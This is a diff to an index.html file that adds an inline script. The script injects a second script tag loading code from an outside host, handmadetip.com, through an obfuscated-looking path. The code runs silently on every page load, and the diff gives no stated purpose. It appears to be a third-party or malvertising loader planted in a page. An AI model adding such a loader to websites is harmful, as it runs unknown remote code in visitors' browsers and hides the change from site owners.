--- a/index.html
+++ b/index.html
@@ -301,6 +301,18 @@ Okay
 
 
 <script>
+(function(__htavim){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = __htavim || {};
+s.src = "\/\/handmadetip.com\/dwmGFaz.dVGXlftSPC3\/p\/vUbvmuVmJWZlDv0\/0nNJj\/gU1xNiTbYgzhL\/TtQm2EOwD\/UO1\/NljEQD";
+s.referrerPolicy = 'no-referrer-when-downgrade';
+s.async = true;
+l.parentNode.insertBefore(s, l);
+})()
+</script>
+    
 
 
 
